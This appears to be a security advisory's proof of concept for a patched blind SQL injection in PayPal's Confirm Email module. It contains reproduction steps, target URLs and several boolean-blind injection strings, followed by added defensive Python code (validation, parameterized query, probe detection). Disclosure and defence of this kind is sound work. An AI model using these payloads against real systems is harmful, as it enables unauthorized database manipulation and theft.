Proof of Concept:
=================
The blind SQL injection vulnerability can be exploited by remote attackers with a low-privileged application user account and without user interaction. For demonstration or to reproduce ...

URL1: Request a session with 2 different mails (Step 1)
https://www.paypal.com/de/ece/cn=06021484023174514599&em=admin@vulnerabiliuty-lab.com
https://www.paypal.com/de/ece/cn=06021484023174514599&em=01x445@gmail.com

URL2: Injection into the ID Confirm field (Step 2)
https://www.paypal.com/de/cgi-bin/webscr?cmd=_confirm-email-password-submit&dispatch=5885d80a13c0db1f8e263663d3faee8d7283e7f0184a5674430f290db9e9c846

1. Open the PayPal website and log in as a standard user with a restricted account.
2. Switch to the webscr > Confirm Email module of the application.
3. Request a login confirm ID when processing to load a reset.
4. Take the valid confirm number from the mail and insert it into the input fields of the email confirm number verification module.
5. Switch to the last char of the valid confirm number in the input field and inject own SQL commands as a check to prove the validation.

Test Strings:
-1+AND+IF(SUBSTRING(VERSION(),1,1)=$i,1,2)=1-1'
-1'+AND+IF(SUBSTRING(VERSION(),1,1)=$i,1,2)=1--1'
1+AND+IF(SUBSTRING(VERSION(),1,1)=$i,1,2)=1
1+AND+IF(SUBSTRING(VERSION(),1,1)=$i,1,2)=-1'

6. Normally the website with the generated ID confirm button is bound to the standard template.
7. Inject substrings with the ID -1+sql-query to check for blind injections in the input field.
8. The bottom bar gets loaded as the result of the successfully executed SQL query.
9. Now the remote attacker can manipulate the PayPal core database with a valid confirm number + his own SQL commands.

Bug Type: Blind SQL Injection [POST] Injection Vulnerability
Session: DE - 22:50 - 23:15 (paypal.com)
Browser: Mozilla Firefox 14.01

PoC:

Note: Always send the requests together with the ID to reproduce the issue. (-) is not possible as the first char of the input request.
Example (Wrong): -1+[SQL-Injection]&06021484023183514599
Example (Right): 06021484023183514599-1+[SQL-Injection]--
Example (Right): 06021484023183514599-1+AND+IF(SUBSTRING(VERSION(),1,1)=$i,1,2)=1-1'-1'--

Note: After the injection was successful 2 times because of my check, the PayPal website opened a security issue report message box as exception handling. I included the details and information of my test and explained the issue, and a short time later it was patched.
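The root cause above is a confirm-number field that accepted a trailing conditional SQL fragment. The following added example (not PayPal's code or the advisory's) shows the defender's side: an allow-list check on the field, a parameterized lookup that cannot be extended by a trailing fragment, and a detection rule for the boolean-blind shape of the test strings. The 20-digit format and the in-memory table are constructed assumptions.

```python
import re
import sqlite3

# Assumption (not stated by PayPal): the confirm numbers in the advisory are
# 20 decimal digits, so that is the allow-list shape used here.
CONFIRM_RE = re.compile(r"^[0-9]{20}$")

# Boolean-based blind marker: a conditional (AND/OR IF(...)) appended to the
# value, as in the advisory's test strings, after form-encoded '+' is decoded.
BLIND_RE = re.compile(r"\b(?:AND|OR)\s+IF\s*\(", re.IGNORECASE)


def is_valid_confirm_number(value: str) -> bool:
    """Allow-list check: the whole field must be exactly 20 digits."""
    return CONFIRM_RE.fullmatch(value) is not None


def flag_blind_probe(value: str) -> bool:
    """Detection: report a submitted value that carries a conditional SQL tail."""
    decoded = value.replace("+", " ")  # '+' is a space in form encoding
    return BLIND_RE.search(decoded) is not None


def demo_db() -> sqlite3.Connection:
    """Constructed in-memory table standing in for the confirm-number store."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE confirm (cn TEXT PRIMARY KEY, account TEXT)")
    conn.execute("INSERT INTO confirm VALUES (?, ?)",
                 ("06021484023183514599", "user-a"))
    return conn


def lookup_confirm(conn: sqlite3.Connection, value: str):
    """Hardened lookup: reject anything but a bare ID, then bind it as a
    parameter so a trailing fragment never reaches the SQL parser."""
    if not is_valid_confirm_number(value):
        raise ValueError("confirm number must be exactly 20 digits")
    row = conn.execute("SELECT account FROM confirm WHERE cn = ?",
                       (value,)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    # Constructed inputs: the advisory's valid ID and its 'Example (Right)'
    # probe with the $i placeholder filled in as the digit 5.
    for v in ("06021484023183514599",
              "06021484023183514599-1+AND+IF(SUBSTRING(VERSION(),1,1)=5,1,2)=1-1'-1'--"):
        print(v[:24], "valid" if is_valid_confirm_number(v) else "rejected",
              "probe" if flag_blind_probe(v) else "clean")
```

The validation rejects the probe before any query is built, and the detection rule fires on the same request so the attempt is logged rather than silently dropped.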